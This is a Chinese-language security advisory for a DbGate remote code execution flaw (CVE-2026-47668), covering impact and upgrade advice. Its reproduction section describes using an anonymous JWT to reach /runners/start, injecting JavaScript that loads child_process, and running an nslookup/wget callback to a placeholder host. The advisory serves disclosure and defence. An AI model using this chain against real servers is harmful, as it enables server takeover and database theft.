漏洞介绍：

DbGate 是一款开源的跨平台数据库管理工具，支持 MySQL、PostgreSQL、SQL Server、MongoDB、Redis、SQLite 等多种主流数据库，广泛用于数据库运维、开发调试、数据查询及管理场景。由于其支持 Web UI 与 Electron 桌面端，并具备数据库连接管理、SQL 执行、数据导入导出等高权限功能，因此在开发、测试及生产环境中部署较为广泛。

“DbGate - Remote Code Execution via Anonymous JWT” 漏洞表明，攻击者可能通过匿名 JWT（JSON Web Token）认证机制缺陷构造恶意身份凭证，从而绕过系统认证逻辑，进一步获取高权限访问能力。在特定条件下，漏洞可能被用于执行任意代码，最终导致服务器失陷。

漏洞影响：

攻击者成功构造匿名 JWT 并绕过身份校验后，可直接进入 DbGate 高权限运行环境。由于 DbGate 本身具备对多种数据库的统一管理能力（如 MySQL、PostgreSQL、SQL Server、MongoDB 等），其权限通常覆盖数据库连接配置、SQL 执行以及数据导入导出等关键功能，因此漏洞影响具有“从应用层延伸到数据层”的特点。

全球分布图：

漏洞编号：CVE-2026-47668

漏洞等级：高危

漏洞复现：

攻击者首先向 /auth/login 发送未携带有效凭证的请求，利用接口默认逻辑获取匿名 JWT（accessToken）；随后在携带该 Token 的情况下构造请求访问 /runners/start 接口，并在请求体 script.commands 中注入恶意 JavaScript 代码；该代码通过拼接方式调用 Node.js process.mainModule.require("child_process") 获取 child_process 模块，并进一步执行 execSync("nslookup {{interactsh-url}} || wget {{interactsh-url}}") 等系统命令，从而触发外带请求完成验证；最终攻击链在 DbGate 服务进程权限下执行任意系统命令，实现远程代码执行（RCE）。

修复建议：

• 建议立即将 DbGate 升级至官方已修复版本（≥7.1.5），官方已在该版本中修复匿名 JWT 签发及 RCE 执行链路相关问题，从根本上消除漏洞利用条件。
• 禁止 /auth/login 在未认证情况下签发有效 Token，强制所有 Token 必须基于真实身份认证生成，并绑定用户权限体系。